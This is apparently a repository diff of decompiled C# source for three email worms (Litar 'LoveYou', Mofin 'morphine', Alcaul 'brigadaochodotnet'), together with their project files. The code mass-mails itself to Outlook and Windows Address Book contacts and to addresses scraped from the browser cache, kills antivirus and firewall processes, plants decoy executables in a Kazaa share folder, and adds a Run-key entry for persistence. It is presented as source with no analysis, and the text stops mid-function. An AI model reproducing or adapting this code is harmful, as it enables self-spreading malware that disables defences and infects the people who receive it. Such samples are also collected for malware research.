// Type: LoveYou.Module1
// Assembly: LoveYou, Version=1.0.797.9891, Culture=neutral, PublicKeyToken=null
// MVID: A69AE25C-A63F-4698-B17A-9CFCAC868A1B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Timers;
namespace LoveYou
{
[StandardModule]
internal sealed class Module1
{
[AccessedThroughProperty("Timer1")]
private static Timer _Timer1;
public const int FILE_ATTRIBUTE_HIDDEN = 2;
public static object fs;
public static Timer Timer1
{
[MethodImpl(MethodImplOptions.Synchronized)] set
{
if (Module1._Timer1 != null)
Module1._Timer1.Elapsed -= new ElapsedEventHandler(Module1.Timer1_Elapsed);
Module1._Timer1 = value;
if (Module1._Timer1 == null)
return;
Module1._Timer1.Elapsed += new ElapsedEventHandler(Module1.Timer1_Elapsed);
}
get => Module1._Timer1;
}
[DllImport("kernel32", EntryPoint = "SetFileAttributesA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern long SetFileAttributes([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName, long dwFileAttributes);
[STAThread]
public static void Main()
{
string str = "静儿,我爱你!Starlight制作";
str = "Jing'er, I Love You! by Starlight";
if (StringType.StrCmp(Interaction.Command(), "", false) == 0)
{
Module1.fs = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Scripting.FileSystemObject"));
if (BooleanType.FromObject(ObjectType.NotObj(LateBinding.LateGet(Module1.fs, (Type) null, "FileExists", new object[1]
{
(object) (Module1.GetSystemPath() + "\\" + Process.GetCurrentProcess().ProcessName + ".exe")
}, (string[]) null, (bool[]) null))))
Module1.CopyMeToSystemFolder();
if (BooleanType.FromObject(ObjectType.NotObj(Module1.IsInfected())))
Module1.InfectByEmail();
}
if (Strings.InStr(Interaction.Command(), "/t") != 0)
{
Module1.Timer1 = new Timer(50000.0);
Module1.Timer1.AutoReset = true;
Module1.Timer1.Enabled = true;
while (true)
;
}
Module1.DoAction();
ProjectData.EndApp();
}
private static void DoAction()
{
if (Interaction.MsgBox((object) "你知道我很爱你吗?", MsgBoxStyle.YesNo | MsgBoxStyle.Question, (object) "提问") == MsgBoxResult.No)
{
if (Interaction.MsgBox((object) "唉!算了,我每次这样问你,你都是这样.我真的很爱你,相信我好吗?", MsgBoxStyle.YesNo | MsgBoxStyle.Question, (object) "提问") == MsgBoxResult.Yes)
{
int num1 = (int) Interaction.MsgBox((object) "真的吗?谢谢!我真的好高兴,你终于相信我说的了");
}
else
{
object obj = (object) "";
while (ObjectType.ObjTst(obj, (object) "", false) == 0)
obj = (object) Interaction.InputBox("那你为什么不相信我呢?告诉我好吗?", "回答");
int num2 = (int) Interaction.MsgBox(ObjectType.StrCatObj(ObjectType.StrCatObj((object) "我就知道你会这么说!", obj), (object) ",你每次都这么告诉我,算了,我相信总有一天能让你明白的"));
}
}
else
{
int num3 = (int) Interaction.MsgBox((object) "真的吗?谢谢!我真的好高兴,你相信我说的话!");
}
}
public static string GetSystemPath() => Environment.SystemDirectory;
public static void InfectByEmail()
{
label_0:
int num1;
int num2;
int num3;
Exception exception;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
num2 = 1;
object objectValue1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell"));
label_2:
num2 = 2;
object o1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Outlook.Application"));
label_3:
num2 = 3;
object o2 = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(o1, (Type) null, "GetNameSpace", new object[1]
{
(object) "MAPI"
}, (string[]) null, (bool[]) null));
label_4:
num2 = 4;
object objectValue2;
object LoopForResult1;
if (!FlowControl.ForLoopInitObj(objectValue2, (object) 1, LateBinding.LateGet(LateBinding.LateGet(o2, (Type) null, "AddressLists", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null), (object) 1, ref LoopForResult1, ref objectValue2))
goto label_24;
label_5:
num2 = 5;
object o3 = o2;
object[] objArray1 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue2)
};
object[] args1 = objArray1;
bool[] flagArray1 = new bool[1]{ true };
bool[] CopyBack1 = flagArray1;
object obj1 = LateBinding.LateGet(o3, (Type) null, "AddressLists", args1, (string[]) null, CopyBack1);
if (flagArray1[0])
objectValue2 = RuntimeHelpers.GetObjectValue(objArray1[0]);
object objectValue3 = RuntimeHelpers.GetObjectValue(obj1);
label_8:
num2 = 6;
object obj2;
if (ObjectType.ObjTst(Conversion.Int(RuntimeHelpers.GetObjectValue(LateBinding.LateGet(LateBinding.LateGet(objectValue3, (Type) null, "AddressEntries", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null))), Conversion.Int(RuntimeHelpers.GetObjectValue(obj2)), false) <= 0)
goto label_23;
label_9:
num2 = 7;
object objectValue4;
object LoopForResult2;
if (!FlowControl.ForLoopInitObj(objectValue4, (object) 1, LateBinding.LateGet(LateBinding.LateGet(objectValue3, (Type) null, "AddressEntries", new object[0], (string[]) null, (bool[]) null), (Type) null, "Count", new object[0], (string[]) null, (bool[]) null), (object) 1, ref LoopForResult2, ref objectValue4))
goto label_21;
label_10:
num2 = 8;
object o4 = objectValue3;
object[] objArray2 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue4)
};
object[] args2 = objArray2;
bool[] flagArray2 = new bool[1]{ true };
bool[] CopyBack2 = flagArray2;
object obj3 = LateBinding.LateGet(o4, (Type) null, "AddressEntries", args2, (string[]) null, CopyBack2);
if (flagArray2[0])
objectValue4 = RuntimeHelpers.GetObjectValue(objArray2[0]);
object objectValue5 = RuntimeHelpers.GetObjectValue(obj3);
label_13:
num2 = 9;
object objectValue6 = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(o1, (Type) null, "CreateItem", new object[1]
{
(object) 0
}, (string[]) null, (bool[]) null));
label_14:
num2 = 10;
object o5 = LateBinding.LateGet(objectValue6, (Type) null, "Recipients", new object[0], (string[]) null, (bool[]) null);
object[] objArray3 = new object[1]
{
RuntimeHelpers.GetObjectValue(objectValue5)
};
object[] args3 = objArray3;
bool[] flagArray3 = new bool[1]{ true };
bool[] CopyBack3 = flagArray3;
LateBinding.LateCall(o5, (Type) null, "Add", args3, (string[]) null, CopyBack3);
if (flagArray3[0])
objectValue5 = RuntimeHelpers.GetObjectValue(objArray3[0]);
label_16:
num2 = 11;
LateBinding.LateSet(objectValue6, (Type) null, "Subject", new object[1]
{
(object) "知道吗?"
}, (string[]) null);
label_17:
num2 = 12;
LateBinding.LateSet(objectValue6, (Type) null, "Body", new object[1]
{
(object) "\r\nHi! \r\n你知道我很想你吗?看看我特意为你准备的礼物吧!\r\n ..."
}, (string[]) null);
label_18:
num2 = 13;
LateBinding.LateCall(LateBinding.LateGet(objectValue6, (Type) null, "Attachments", new object[0], (string[]) null, (bool[]) null), (Type) null, "Add", new object[1]
{
(object) (Environment.CurrentDirectory + "\\" + Process.GetCurrentProcess().ProcessName + ".exe")
}, (string[]) null, (bool[]) null);
label_19:
num2 = 14;
LateBinding.LateCall(objectValue6, (Type) null, "Send", new object[0], (string[]) null, (bool[]) null);
label_20:
num2 = 15;
if (FlowControl.ForNextCheckObj(objectValue4, LoopForResult2, ref objectValue4))
goto label_10;
label_21:
num2 = 16;
o1 = (object) null;
label_22:
num2 = 17;
o2 = (object) null;
label_23:
num2 = 19;
if (FlowControl.ForNextCheckObj(objectValue2, LoopForResult1, ref objectValue2))
goto label_5;
label_24:
num2 = 20;
LateBinding.LateCall(objectValue1, (Type) null, "RegWrite", new object[2]
{
(object) "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RoseGarden",
(object) (Module1.GetSystemPath() + "\\" + Process.GetCurrentProcess().ProcessName + ".exe /t")
}, (string[]) null, (bool[]) null);
label_25:
num2 = 21;
Module1.MarkInfected();
goto label_34;
label_26:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 0:
goto label_0;
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_8;
case 7:
goto label_9;
case 8:
goto label_10;
case 9:
goto label_13;
case 10:
goto label_14;
case 11:
goto label_16;
case 12:
goto label_17;
case 13:
goto label_18;
case 14:
goto label_19;
case 15:
goto label_20;
case 16:
goto label_21;
case 17:
goto label_22;
case 18:
case 19:
goto label_23;
case 20:
goto label_24;
case 21:
goto label_25;
case 22:
goto label_34;
}
}
catch (Exception ex) when (false)
{
ProjectData.SetProjectError(ex);
exception = ex;
if (num3 == 0)
{
num3 = num2;
switch (num1)
{
case 1:
goto label_26;
default:
throw;
}
}
}
throw exception;
label_34:
if (num3 == 0)
return;
ProjectData.ClearProjectError();
}
public static void MarkInfected()
{
object objectValue = RuntimeHelpers.GetObjectValue(LateBinding.LateGet(Module1.fs, (Type) null, "CreateTextFile", new object[1]
{
(object) ("c:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue)))
}, (string[]) null, (bool[]) null));
LateBinding.LateCall(objectValue, (Type) null, "write", new object[1]
{
(object) ("Install date:" + StringType.FromDate(DateTime.Now))
}, (string[]) null, (bool[]) null);
LateBinding.LateCall(objectValue, (Type) null, "Close", new object[0], (string[]) null, (bool[]) null);
string lpFileName = "c:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue));
Module1.SetFileAttributes(ref lpFileName, 2L);
}
public static object IsInfected() => RuntimeHelpers.GetObjectValue(LateBinding.LateGet(Module1.fs, (Type) null, "FileExists", new object[1]
{
(object) ("C:\\$windir$.log" + StringType.FromChar(Strings.Chr((int) byte.MaxValue)))
}, (string[]) null, (bool[]) null));
public static void CopyMeToSystemFolder()
{
label_0:
int num1;
int num2;
int num3;
Exception exception;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
num2 = 1;
LateBinding.LateCall(Module1.fs, (Type) null, "CopyFile", new object[2]
{
(object) (Environment.CurrentDirectory + "\\" + Process.GetCurrentProcess().ProcessName + ".exe"),
(object) (Module1.GetSystemPath() + "\\")
}, (string[]) null, (bool[]) null);
goto label_10;
label_2:
int num4 = num3 + 1;
num3 = 0;
switch (num4)
{
case 0:
goto label_0;
case 1:
goto label_1;
case 2:
goto label_10;
}
}
catch (Exception ex) when (false)
{
ProjectData.SetProjectError(ex);
exception = ex;
if (num3 == 0)
{
num3 = num2;
switch (num1)
{
case 1:
goto label_2;
default:
throw;
}
}
}
throw exception;
label_10:
if (num3 == 0)
return;
ProjectData.ClearProjectError();
}
public static void Timer1_Elapsed(object sender, ElapsedEventArgs e) => Module1.DoAction();
}
}
MSIL/Email-Worm/MSIL/M/Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/MSIL/M/Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c/Email-Worm.MSIL.Mofin.a.csproj
+39
View File
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BEA0F945-4328-46F1-96B0-91D907C60288}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>morphine</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Web" />
</ItemGroup>
<ItemGroup>
<Compile Include="morphine.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/MSIL/M/Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c/Email-Worm.MSIL.Mofin.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "morphine", "Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.csproj", "{BEA0F945-4328-46F1-96B0-91D907C60288}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BEA0F945-4328-46F1-96B0-91D907C60288}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BEA0F945-4328-46F1-96B0-91D907C60288}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/MSIL/M/Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c/morphine.cs
+56
View File
@@ -0,0 +1,56 @@
// Decompiled with JetBrains decompiler
// Type: morphine
// Assembly: morphine, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F0E102F2-BABF-44AE-B535-A66C5781349C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Mofin.a-ccfa30bdcb8041c6e1b24544d159b59bd5119ffa92cdd82b36847cf1b379025c.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Text;
using System.Web.Mail;
internal class morphine
{
public static void main()
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\WAB\\WAB4\\Wab File Name");
if (registryKey == null)
return;
string path = (string) registryKey.GetValue("");
if (path == null)
return;
registryKey.Close();
FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read);
// ISSUE: explicit non-virtual call
int int32_1 = Convert.ToInt32(__nonvirtual (fileStream.Length));
byte[] numArray = new byte[int32_1];
// ISSUE: explicit non-virtual call
__nonvirtual (fileStream.Read(numArray, 0, int32_1));
// ISSUE: explicit non-virtual call
__nonvirtual (fileStream.Close());
int int32_2 = BitConverter.ToInt32(numArray, 100);
if (int32_2 == 0)
return;
int int32_3 = BitConverter.ToInt32(numArray, 96);
do
{
// ISSUE: explicit non-virtual call
string str1 = __nonvirtual (Encoding.Unicode.GetString(numArray, int32_3, 68));
int startIndex = str1.IndexOf(char.MinValue);
string str2 = str1.Remove(startIndex, 34 - startIndex);
MailMessage message = new MailMessage();
message.Subject = "hi";
message.To = str2;
message.Body = "hi";
message.BodyFormat = MailFormat.Text;
message.Priority = MailPriority.High;
MailAttachment mailAttachment = new MailAttachment(Directory.GetCurrentDirectory() + "\\morphine.exe", MailEncoding.Base64);
message.Attachments.Add((object) mailAttachment);
SmtpMail.Send(message);
int32_3 += 68;
--int32_2;
}
while (int32_2 > 0);
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/Email-Worm.Win32.Alcaul.af.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>2peace</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CPrivateImplementationDetails_003E.cs" />
<Compile Include="alcopaul\brigadaochodotnet.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/Email-Worm.Win32.Alcaul.af.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "2peace", "Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.csproj", "{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BF3E59E5-2F5A-4D61-876C-9CA2230D5ADD}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/_003CPrivateImplementationDetails_003E.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using System.Runtime.InteropServices;
internal class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000003\u002D1 \u0024\u0024method0x6000003\u002D1;
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000003\u002D1
{
}
}
MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/alcopaul/brigadaochodotnet.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: alcopaul.brigadaochodotnet
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace alcopaul
{
public class brigadaochodotnet
{
public static void Main(string[] args)
{
string str1 = "zonealarm,wfindv32,vb6,webscanx,vsstat,vshwin32,vsecomr,vscan40,vettray,vet95,tds2-nt,tds2-98,tca,tbscan,sweep95,sphinx,smc,serv95,scrscan,scanpm,scan95,scan32,safeweb,rescue,rav7win,rav7,persfw,pcfwallicon,pccwin98,pavw,pavsched,pavcl,padmin,outpost,nvc95,nupgrade,normist,nmain,nisum,navwnt,navw32,navnt,navlu32,navapw32,n32scanw,mpftray,moolive,luall,lookout,lockdown2000,jedi,iomon98,iface,icsuppnt,icsupp95,icmon,icloadnt,icload95,ibmavsp,ibmasn,iamserv,iamapp,frw,fprot,fp-win,findviru,f-stopw,f-prot95,f-prot,f-agnt95,espwatch,esafe,ecengine";
string str2 = "dvp95_0,dvp95,cleaner3,cleaner,claw95cf,claw95,cfinet32,cfinet,cfiaudit,cfiadmin,blackice,blackd,avwupd32,avwin95,avsched32,avpupd,avptc32,avpm,avpdos32,avpcc,avp32,avp,avnt,avkserv,avgctrl,ave32,avconsol,autodown,apvxdwin,anti-trojan,ackwin32,_avpm,_avpcc,_avp32";
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string ave in strArray1)
brigadaochodotnet.killprocs(ave);
foreach (string ave in strArray2)
brigadaochodotnet.killprocs(ave);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string tach = brigadaochodotnet.uue(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[11]
{
"shakira.exe",
"avril_lavigne.exe",
"Visual_Studio.NET2003_key.exe",
"teach_yourself_c#_in_1_week.exe",
"scan.net.exe",
"hitman2fulldownloader.exe",
"Tekken4_full_downloader.exe",
"teach_yourself_COBOL.NET_in_21_days.exe",
"how_to_get_chicks_on_your_bed.exe",
"brigadaocho.net.exe",
"drunken_pope_pics.exe"
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager", true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + registryKey1.GetValue("Default Mail Account").ToString(), true);
string mserv = registryKey2.GetValue("SMTP Server").ToString();
string fm = registryKey2.GetValue("SMTP Email Address").ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, "*.ht*"))
brigadaochodotnet.extractmails(file, mserv, fm, tach);
}
}
int num = (int) MessageBox.Show("brigada ocho ::: \"bringing the c# technology to the masses\"", "msil.mass by PerrunBoy ::: http://vx.netlux.org/~b8", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
public static void extractmails(string phile, string mserv, string fm, string tach)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(phile, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string to = brigadaochodotnet.xtrak(streamReader.ReadLine());
if (to != "")
brigadaochodotnet.castaway(mserv, fm, to, tach);
}
streamReader.Close();
}
public static string xtrak(string datum)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = datum;
try
{
int sourceIndex = str1.IndexOf("mailto:");
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace("mailto:", "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string uue(string attch)
{
FileStream input = new FileStream(attch, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void killprocs(string ave)
{
foreach (Process process in Process.GetProcessesByName(ave))
process.Kill();
}
public static void castaway(string serv, string from, string to, string attch)
{
string str1 = "From: " + from + " <" + from + ">\r\n";
string str2 = "To: " + to + " <" + to + ">\r\n";
string str3 = "Date: " + DateTime.Now.ToString() + "\r\n";
string str4 = "X-Mailer: dotNETSMTPengine\r\n";
string str5 = "X-Priority: 3\r\n";
string str6 = "MIME-Version: 1.0\r\n";
string str7 = "Content-Type: multipart/mixed; boundary=\"----=rerty\";\r\n\r\n";
string str8 = "This is a multi-part message in MIME format.\r\n\r\n";
string str9 = "------=rerty\r\n";
string str10 = "Content-Type: text/html; charset=us-ascii\r\n\r\n";
string str11 = "\"all we are saying, is give peace a chance. no to war and terrorism.\"\r\n\r\n";
string str12 = "------=rerty\r\n";
string str13 = "Content-Type: application/x-msdownload; name=\"topeace.exe\"\r\n";
string str14 = "Content-Transfer-Encoding: base64\r\n";
string str15 = "Content-Disposition: attachment; ";
string str16 = "filename=\"topeace.exe\"\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "------=rerty--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(serv, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes("HELO localhost\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes("MAIL FROM: <" + from + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes("RCPT TO: <" + to + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes("DATA\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + attch + str17 + str18);
